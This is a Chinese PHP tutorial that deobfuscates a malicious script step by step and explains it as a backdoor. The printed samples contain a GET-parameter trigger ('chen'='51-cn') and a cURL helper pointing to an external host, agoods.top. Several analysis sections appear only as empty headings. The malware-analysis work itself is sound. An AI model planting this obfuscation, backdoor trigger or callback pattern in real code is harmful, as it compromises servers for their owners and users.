
在web开发和系统维护中,我们有时会遇到难以理解的php代码,这些代码可能经过混淆处理。代码混淆是一种有意使代码难以阅读和理解的技术,其目的通常是保护知识产权或隐藏恶意行为。对于服务器上发现的异常或未知代码,进行去混淆是分析其功能、识别潜在威胁(如后门、恶意注入)的关键步骤。本教程将通过一个具体的php代码示例,详细演示去混淆的整个过程,并分析其潜在的恶意意图。
在开始去混淆之前,首先要识别代码中的混淆特征。常见的PHP混淆手段包括:
我们提供的示例代码中,主要使用了URL编码和通过索引访问长字符串的方式来混淆。
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
// ... 更多代码 ...可以看到,$OOOOOO是一个URL编码的字符串,随后被urldecode()解码并赋值给$O。接下来的代码中,大量使用了$O{x}(PHP中已弃用的字符串按索引访问语法)来构建新的字符串。
去混淆是一个迭代和细致的过程,需要耐心和逻辑分析。
立即学习“PHP免费学习笔记(深入)”;
首先,我们需要解码$OOOOOO变量。 原始代码: $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";$O=urldecode($OOOOOO);
通过执行urldecode($OOOOOO),我们可以得到$O的实际内容:
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";这个字符串包含了键盘上的字符,以及一些特殊符号,是后续字符拼接的基础。
接下来,代码中大量使用$O{索引}的方式来获取字符。我们需要将这些表达式替换为实际的字符。例如,$O{21}代表索引为21的字符,即c。 原始代码片段: if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
替换后: if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
对所有出现$O{x}的地方进行替换,得到如下代码:
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}上一步得到的代码中,许多字符串是通过.运算符拼接的。为了提高可读性,可以将这些拼接的字符串合并成一个完整的字符串。 例如:"c"."h"."e"."n" 变为 "chen"。
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}代码中使用了大量无意义的变量名(如$oooOoOoOoooOooOOooooo)和函数名(如ooooooooOOOOOOOOoooooOOO)。为提高可读性,根据其用途赋予有意义的名称。
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__); // 获取当前文件内容
$parts = explode("<?php",$thisFileSource); // 按"<?php"分割文件内容
if(strpos($parts[1],'%71%77%65')!==false){ // 检查第二部分是否包含特定URL编码字符串
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1'; // 子域名片段
$url="http://".$subdomain.".agoods.top"; // 构造完整URL
function sendRequest($targetUrl){ // 定义一个发送HTTP请求的函数
$curlHandle=curl_init();
curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl);
curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curlHandle);
curl_close($curlHandle);
return $result;
}最后,对代码进行格式化,包括拆分过长的行、调整缩进等,使其更符合编程规范,进一步提升可读性。
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); // 禁用所有错误报告
// 核心字符映射表,用于构建其他字符串
// $O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\%{}!*|+,";
// 检查URL查询参数,如果$_GET["chen"]的值为"51-cn",则执行后续逻辑
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__); // 读取当前PHP文件的全部内容
// 将文件内容按"<?php"分割。通常,恶意代码会注入到现有PHP文件的末尾或中间。
// 如果文件中有多个"<?php"标记,这里会将其分割成多个部分。
$parts = explode("<?php",$thisFileSource);
// 检查第二个部分(即第一个"<?php"标记之后的内容)是否包含特定的URL编码字符串。
// '%71%77%65' 对应 'qwe' 的URL编码。这可能是恶意代码自身特征的检查。
if(strpos($parts[1],'%71%77%65') !== false){
echo "[ok!]"; // 如果包含,输出"[ok!]"
exit;
}else{
echo "[fail!]"; // 否则,输出"[fail!]"
exit;
}
}
$subdomain = 'z0807_1'; // 定义一个子域名片段
// 构造一个完整的外部URL,指向 'http://z0807_1.agoods.top'
$externalUrl = "http://".$subdomain.".agoods.top";
/**
* 发送HTTP GET请求到指定URL的函数
* @param string $targetUrl 目标URL
* @return string 请求结果或false
*/
function sendRequest($targetUrl){
$curlHandle = curl_init(); // 初始化cURL会话
curl_setopt ($curlHandle, CURLOPT_URL, $targetUrl); // 设置请求URL
curl_setopt ($curlHandle, CURLOPT_RETURNTRANSFER, 1); // 设置将curl_exec()获取的信息以字符串返回,而不是直接输出
curl_setopt ($curlHandle, CURLOPT_CONNECTTIMEOUT, 5); // 设置连接超时时间为5秒
$result = curl_exec($curlHandle); // 执行cURL请求
curl_close($curlHandle); // 关闭cURL会话
return $result; // 返回请求结果
}
// 注意:在此代码片段中,sendRequest 函数虽然被定义,但并未被调用。
// 这可能意味着它在代码的其他部分被调用,或者是一个未完成的恶意功能。经过去混淆和重命名后,代码的真实意图变得清晰:
错误抑制与字符映射表:
后门入口与自检机制:
外部通信函数:
关键发现与潜在威胁:
面对此类混淆的恶意PHP代码,应采取以下措施:
去混淆是理解和对抗恶意代码的重要技能。通过本教程的步骤,我们不仅成功地将一段高度混淆的PHP代码还原为可读形式,还深入分析了其作为潜在后门和外部通信工具的恶意意图。识别、分析并清除此类恶意代码,结合全面的安全加固措施,是维护网站和服务器安全的关键。
以上就是PHP代码混淆与恶意脚本分析:一步步去混淆指南的详细内容,更多请关注php中文网其它相关文章!
PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!
Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号